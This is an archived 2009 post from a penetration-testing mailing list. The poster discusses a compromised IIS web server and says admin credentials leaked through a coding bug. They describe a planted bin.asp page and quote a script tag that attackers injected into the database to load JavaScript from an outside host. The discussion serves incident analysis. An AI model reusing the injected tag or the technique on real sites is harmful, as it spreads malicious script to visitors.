Penetration Testing mailing list archives
RE: Smells Funny: Looking for help against Chinese Hacking Team
From: northbayts () hushmail com
Date: Sun, 11 Jan 2009 16:47:49 -0800
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Does anyone else get the same sort of creepy-crawly feeling? When I look at the way it was written, and the obvious vulnerabilities/clues given, it smells to good to be true.
Nah, it's true. This tag was inserted into his sql db. text fields: <script>-id=http--dbios.org/h.js></script>. Dozens of his pages came up on google at that time, they seem to be clean now...
Or is this level of innate incompetence the norm?
Yes. It was easy enough to obtain the admin credentials due to a coding error on his info request page. I suspect there were many more coding errors and who knows what was added to the box in it's vulnerable state. some more info from the owner... Basically we have a request for a non existent page. Instead of returning a 404, the IIS log reports a 200 usually from a Chinese IP address that is not among the 32,000 I currently ban. I can find the page on the file system in some cases but it's usually not anywhere below the web root. It has in one case been in the Recycler. Once the page is renamed from bin.asp -> bin.asp_hacked then the requests stop soon thereafter. One more feature is that the attack requests are viewable in Internet Explorer. Cheers, n00b_pt -----BEGIN PGP SIGNATURE----- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAklqkzcACgkQOxwoc/IbnabVEAQAiuF9ajxPL6NDy8bDYyGm1+vBalHy NoDkUJ+TvEp8TPXZN4SfyPy2ICbT6+2RRVhLITycWxfLOon0P2KuHDEZmB0soqiV+1J/ M2TUXgoj/9oft47mzetXdhzIcHjq0AYLMGRjfOu/qZXzN/qK0vX7/bNqpHrnC6CRXQT9 02Dcluw= =3HqB -----END PGP SIGNATURE----- -- Become a medical transcriptionist at home, at your own pace. http://tagline.hushmail.com/fc/PnY6qxthN5km6GSzbTnejBGVHiKYfw21lDFxp8X6sKWpPDRurJpVr/
Current thread:
- Smells Funny: Looking for help against Chinese Hacking Team jc (Jan 11)
- Message not available
- Message not available
- Re: Smells Funny: Looking for help against Chinese Hacking Team Adriel T. Desautels (Jan 11)
- Message not available
- Message not available
- Message not available
- Re: Smells Funny: Looking for help against Chinese Hacking Team Dotzero (Jan 11)
- <Possible follow-ups>
- RE: Smells Funny: Looking for help against Chinese Hacking Team northbayts (Jan 11)